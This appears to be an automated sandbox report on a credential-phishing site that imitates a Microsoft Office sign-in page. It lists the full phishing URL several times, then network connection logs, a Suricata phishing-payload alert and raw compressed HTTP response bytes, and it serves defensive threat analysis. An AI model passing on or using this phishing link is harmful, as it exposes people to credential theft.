            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.5:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.207:443 -> 192.168.2.5:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.235:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.235:443 -> 192.168.2.5:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.235:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.235:443 -> 192.168.2.5:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.235:443 -> 192.168.2.5:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.235:443 -> 192.168.2.5:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.234:443 -> 192.168.2.5:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.168.137.144:443 -> 192.168.2.5:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.168.137.144:443 -> 192.168.2.5:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.168.137.144:443 -> 192.168.2.5:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.168.137.144:443 -> 192.168.2.5:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 150.171.27.254:443 -> 192.168.2.5:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49774 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49776 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49777 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49779 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49784 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49786 version: TLS 1.2

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2857090 - Severity 1 - ETPRO PHISHING JS/PsyduckPockeball Payload Inbound : 137.184.178.231:443 -> 192.168.2.5:49733
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
            Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
            Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/htmlContent-Encoding: gzipLast-Modified: Tue, 08 Apr 2025 19:12:14 GMTAccept-Ranges: bytesETag: "89341723baa8db1:0"Vary: Accept-EncodingServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Wed, 09 Apr 2025 00:18:33 GMTContent-Length: 3140Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e ff ae 4f bf 3c 79 f3 fb bc 3c 4d e7 ed a2 3c 4a 1e 9b 1f 79 36 a3 1f 6d d1 96 f9 d1 e3 bb f2 33 79 bc c8 db 8c 5a b6 ab ed fc 17 ad 8b cb cf 3e 9a 56 cb 36 5f b6 db ed f5 2a ff 28 d5 bf 3e fb a8 cd df b5 77 01 ea 30 9d ce b3 ba c9 db cf d6 ed f9 f6 c1 47 06 c6 32 5b e4 9f 7d f4 36 bf be aa ea 59 e3 bd d9 69 71 59 e4 57 ab aa 6e bd 16 57 c5 ac 9d 7f f6 f0 d3 9d 51 ba c8 de 15 8b f5 62 bb 99 66 65 fe d9 6e e7 dd 59 de 4c eb 62 d5 16 d5 d2 7b 1d 8d ca 62 f9 36 9d d7 f9 f9 67 1f 61 30 cd a3 bb 77 cf e9 fb 66 7c 51 55 17 65 9e ad 8a 66 3c ad 16 77 f3 ac 2e af b3 e9 34 6f 9a bb d4 c3 f9 3c 9f d4 f9 d5 78 da 10 c6 75 5e 7e f6 51 d3 5e 97 79 33 cf 73 42 10 24 d0 91 73 83 bb d4 91 20 e0 7f f5 d3 d9 65 26 9f 7e 94 36 f5 d4 21 90 fd 74 f6 ae db 3f 3e bb 5b 16 93 e6 ee 4f ff a2 75 5e 5f df dd 1d 3f 18 ef e9 1f e3 45 b1 1c ff 74 f3 11 4d 8f 00 7c bf fe 9a 36 6b 8b e9 78 95 5d e4 57 c5 0f a6 b3 25 f7 f8 fc e5 6b fe fc 55 de 54 eb 9a 06 7e b7 5c 3d ab ea c5 4f 66 65 31 a3 2f aa 65 43 7d fe 1e 97 9f ed 1e 8c 77 76 c7 7b fb 3f db dd 9f 67 cb e9 f5 a4 7a 77 57 3e 30 63 37 1f 6f 40 26 32 c9 df 54 a7 34 bf 7e af df 38 2f dc 16 4f c5 ab 2d 56 1b e8 20 bf 7c a3 fd 36 57 e7 d5 e4 a7 f3 69 fb c3 ed 56 87 fb d3 4d b5 dc de 1b ef d1 2f 3f c4 ce 27 55 d5 36 6d 9d ad 54 ee 7e 88 5d 37 57 c4 54 db a4 80 ea f6 86 ce 3f 80 e7 99 7d f7 82 be 88 75 fd 8e 6e c3 e6 df 00 06 e5 ea a4 5a 2c 2a 6a f5 fe dd 7f 13 14 08 27 9a 00 bf 3f 12 3a 1f 97 59 0d bb 73 5e d4 8b df 1f cd d2 cf d2 8f 99 b2 1f 1f fa 5f ad eb f2 b3 8f c3 8f 16 cd c5 67 1f bf 99 67 34 96 eb 6a fd bb ca 97 f4 e7 8c de 96 f6 77 bf 2d 7f 99 9f e3 ac 59 bd fb 3d 30 c6 62 f6 d9 a7 fb 07 fb 9f 3e 90 b7 68 24 d3 b7 e6 2d 9f 24 8d a1 08 93 e3 e5 77 5f 16 ef f2 92 c1 c8 8b 35 4c 7c 9d cf 04 99 97 64 96 9a 9c 10 5c ac ca bc cd d3 ac 2c 6d 8b f4 bc c8 cb 59 23 af e5 8b ac 28 83 77 ce 0b 6a 5b 2c d3 2c bd 84 15 91 16 69 36 9b d5 64 57 e5 a5 ac 5c cd b3 49 4e d3 d1 7f b3 5a 96 d7 5e 03 71 28 bc d7 96 eb 45 5e 6f 7e 51 9b f8 af ea 47 03 6f e9 b7 fe 0b ab 79 b5 cc fb cd bd 71 71 0b bc 3a c9 6b 79 87 27 9b a7 fe b3 8f e9 4d 32 1d f2 39 08 ff fb d3 3c 7d ec 4f d4 ea 6a 8d 8f 76 ef ed ee 3f f8 d4 7c b4 2a b3 25 3e a5 0f 12 fd 84 de 25 4b 9c 7d f6 f1 ef 73 fc f9 ef 33 3b 29 4f 96 45 76 ef de 93 df fb a7 ef fd d4 27 f3 9f 98 3e 5d 4f 57 6f eb ac be fe bd 7e f2 c5 93 f6 db cd b7 97 65 75 f7 d5 ea 27 de e6 0f 1f 3e 5f
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/10.0X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Wed, 09 Apr 2025 00:18:36 GMTContent-Length: 1506Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 37 4e 1e ff ae 4f bf 3c 79 f3 fb bc 3c 4d e7 ed a2 4c 5f 7e f5 e4 f9 d9 49 fa d1 f6 dd bb df bd 77 72 f7 ee d3 37 4f d3 df fb db 6f be 78 9e ee 8e 77 d2 37 75 b6 6c 8a b6 a8 96 59 79 f7 ee e9 8b 8f d2 8f e6 6d bb 7a 74 f7 ee d5 d5 d5 f8 ea de b8 aa 2f ee be 79 75 f7 1d 60 ed e2 65 fd 75 bb f5 de 1c cf da d9 47 47 d4 35 be 4a df 2d ca 65 f3 59 04 ce ee c3 87 0f e5 f5 8f 52 6e 9d 67 33 fa 99 d2 f3 b8 2d da 32 3f 7a 7c 57 7e ea 87 8b bc cd 68 14 ed 6a 3b ff 45 eb e2 f2 b3 8f 7e ef ed af 8e b7 4f aa c5 2a 6b 8b 49 99 7f 94 4e ab 65 9b 2f db cf 3e 3a 3b fd 2c 9f 5d d0 27 77 8f e8 4d 7e 14 48 59 2c df a6 75 5e 7e f6 51 d3 5e 97 79 33 cf f3 f6 a3 74 5e e7 e7 82 63 43 48 4e 57 e3 55 76 91 5f 15 3f 18 4f ab c5 dd 69 d3 dc 5d 5d 9d bc 94 17 c6 f4 e7 47 69 7b bd ca 3f fb a8 cd df b5 f8 1a fd d0 08 ee ea 10 1e 4f aa d9 75 ca cd 3f fb 68 92 4d df 5e d4 d5 7a 39 7b f4 e3 e7 bb f8 0f b4 21 54 d2 c7 e7 55 bd 48 69 54 f3 6a f6 d9 47 ab aa 21 44 b2 29 68 f8 d9 47 e3 bb e7 d9 65 41 e3 19 d3 3f bf c7 fe ce fe ef 7e 6f 02 f4 7e f7 7b d9 ef be 77 4e ff 5b ed 5a 1c 97 79 4b 1f 1f ec d0 a7 de 4b 1f a5 05 41 45 17 dc e1 e3 59 71 99 4e cb ac a1 b9 c8 9a d5 8b bc fd 76 31 9b e5 4b fe ae 58 ae d6 ad 8e 69 2e 1f a7 cb 6c 41 7f fd fe bf ff 4f 9e 9d 7e f7 f5 9b e3 37 a7 02 30 f8 e0 32 2b d7 d4 e8 ee d5 e9 cb a7 57 5f fd 5e cf df 7c f5 ee 8b 37 d3 ab 17 3f b8 78 f7 c5 e7 af de 3e ff f6 f4 bb df b9 98 7c 77 af 39 69 2e 7f f2 27 bf 53 fe e0 e4 f7 79 f9 e9 f4 bb 7b af 8e 77 56 ed ec 74 f2 6a f5 fb cc f6 5e 96 5f fe c4 db cf 0c 09 09 cd a3 df 38 a1 df e8 97 21 7c 7f e3 e4 c7 6e 87 f2 e7 a7 2f 4e 5f 1d bf f9 f2 55 0f 77 ef 1b 1d c4 ee c3 7b c7 f7 f6 9f 3e f1 11 91 79 c2 e3 a3 03 ba b7 d5 0a 98 d0 37 f6 e9 36 69 8a 1f e4 1f 59 f6 c3 13 b6 a7 c7 7f a5 ac 2e aa 8f 8e 1e 13 87 07 bc 08 81 01 34 4c 34 31 23 71 48 49 fc fd 52 3e 21 3e 84 80 b8 bf 8f 1e 17 8b 8b b4 a9 a7 0e 40 87 99 8b 05 fd 41 fc 4c ff d2 47 db e8 75 bb 5a b7 79 3d 5e 2d 2f 42 e8 e9 f3 6c 39 2b 96 17 29 fe 66 1e 7f 7c 37 a3 ff 13 d2 c1 b0 e8 09 47 26 4d dc 67 dd bf dd 6f 1d 02 14 4b 62 5e 48 f0 ed 68 1b b6 c1 d3 6d c7 e4 89 35 c4 f3 78 be 7b 44 92 95 6e f3 00 d3 17 55 9b 3e 83 9c 92 1c ef 46 5e 91 51 d0 2f 43 4f f8 8a 34 77 9f f5 fe a6 3f 0d aa a5 10 7a 1b 28 37 db ef 45 03 fa 62 f0 09 df c7 e3 c3 d0 6e b6 eb e2 62 4e 9d d1 b7 bd a7 0f 00 4f 00 a4 cc b3 9a d8 8e 07 b7 a9 bd 6a c3 45 56 d3 2c 6f 93 f8 3c da 59 bd 3b 0c 94
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/10.0X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Wed, 09 Apr 2025 00:18:36 GMTContent-Length: 1506Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 37 4e 1e ff ae 4f bf 3c 79 f3 fb bc 3c 4d e7 ed a2 4c 5f 7e f5 e4 f9 d9 49 fa d1 f6 dd bb df bd 77 72 f7 ee d3 37 4f d3 df fb db 6f be 78 9e ee 8e 77 d2 37 75 b6 6c 8a b6 a8 96 59 79 f7 ee e9 8b 8f d2 8f e6 6d bb 7a 74 f7 ee d5 d5 d5 f8 ea de b8 aa 2f ee be 79 75 f7 1d 60 ed e2 65 fd 75 bb f5 de 1c cf da d9 47 47 d4 35 be 4a df 2d ca 65 f3 59 04 ce ee c3 87 0f e5 f5 8f 52 6e 9d 67 33 fa 99 d2 f3 b8 2d da 32 3f 7a 7c 57 7e ea 87 8b bc cd 68 14 ed 6a 3b ff 45 eb e2 f2 b3 8f 7e ef ed af 8e b7 4f aa c5 2a 6b 8b 49 99 7f 94 4e ab 65 9b 2f db cf 3e 3a 3b fd 2c 9f 5d d0 27 77 8f e8 4d 7e 14 48 59 2c df a6 75 5e 7e f6 51 d3 5e 97 79 33 cf f3 f6 a3 74 5e e7 e7 82 63 43 48 4e 57 e3 55 76 91 5f 15 3f 18 4f ab c5 dd 69 d3 dc 5d 5d 9d bc 94 17 c6 f4 e7 47 69 7b bd ca 3f fb a8 cd df b5 f8 1a fd d0 08 ee ea 10 1e 4f aa d9 75 ca cd 3f fb 68 92 4d df 5e d4 d5 7a 39 7b f4 e3 e7 bb f8 0f b4 21 54 d2 c7 e7 55 bd 48 69 54 f3 6a f6 d9 47 ab aa 21 44 b2 29 68 f8 d9 47 e3 bb e7 d9 65 41 e3 19 d3 3f bf c7 fe ce fe ef 7e 6f 02 f4 7e f7 7b d9 ef be 77 4e ff 5b ed 5a 1c 97 79 4b 1f 1f ec d0 a7 de 4b 1f a5 05 41 45 17 dc e1 e3 59 71 99 4e cb ac a1 b9 c8 9a d5 8b bc fd 76 31 9b e5 4b fe ae 58 ae d6 ad 8e 69 2e 1f a7 cb 6c 41 7f fd fe bf ff 4f 9e 9d 7e f7 f5 9b e3 37 a7 02 30 f8 e0 32 2b d7 d4 e8 ee d5 e9 cb a7 57 5f fd 5e cf df 7c f5 ee 8b 37 d3 ab 17 3f b8 78 f7 c5 e7 af de 3e ff f6 f4 bb df b9 98 7c 77 af 39 69 2e 7f f2 27 bf 53 fe e0 e4 f7 79 f9 e9 f4 bb 7b af 8e 77 56 ed ec 74 f2 6a f5 fb cc f6 5e 96 5f fe c4 db cf 0c 09 09 cd a3 df 38 a1 df e8 97 21 7c 7f e3 e4 c7 6e 87 f2 e7 a7 2f 4e 5f 1d bf f9 f2 55 0f 77 ef 1b 1d c4 ee c3 7b c7 f7 f6 9f 3e f1 11 91 79 c2 e3 a3 03 ba b7 d5 0a 98 d0 37 f6 e9 36 69 8a 1f e4 1f 59 f6 c3 13 b6 a7 c7 7f a5 ac 2e aa 8f 8e 1e 13 87 07 bc 08 81 01 34 4c 34 31 23 71 48 49 fc fd 52 3e 21 3e 84 80 b8 bf 8f 1e 17 8b 8b b4 a9 a7 0e 40 87 99 8b 05 fd 41 fc 4c ff d2 47 db e8 75 bb 5a b7 79 3d 5e 2d 2f 42 e8 e9 f3 6c 39 2b 96 17 29 fe 66 1e 7f 7c 37 a3 ff 13 d2 c1 b0 e8 09 47 26 4d dc 67 dd bf dd 6f 1d 02 14 4b 62 5e 48 f0 ed 68 1b b6 c1 d3 6d c7 e4 89 35 c4 f3 78 be 7b 44 92 95 6e f3 00 d3 17 55 9b 3e 83 9c 92 1c ef 46 5e 91 51 d0 2f 43 4f f8 8a 34 77 9f f5 fe a6 3f 0d aa a5 10 7a 1b 28 37 db ef 45 03 fa 62 f0 09 df c7 e3 c3 d0 6e b6 eb e2 62 4e 9d d1 b7 bd a7 0f 00 4f 00 a4 cc b3 9a d8 8e 07 b7 a9 bd 6a c3 45 56 d3 2c 6f 93 f8 3c da 59 bd 3b 0c 94
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/10.0X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Wed, 09 Apr 2025 00:18:45 GMTContent-Length: 132Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e f1 47 75 de ac cb f6 a3 47 3b bf e4 ff 01 9d 98 6b 29 0c 00 00 00 Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~GuG;k)
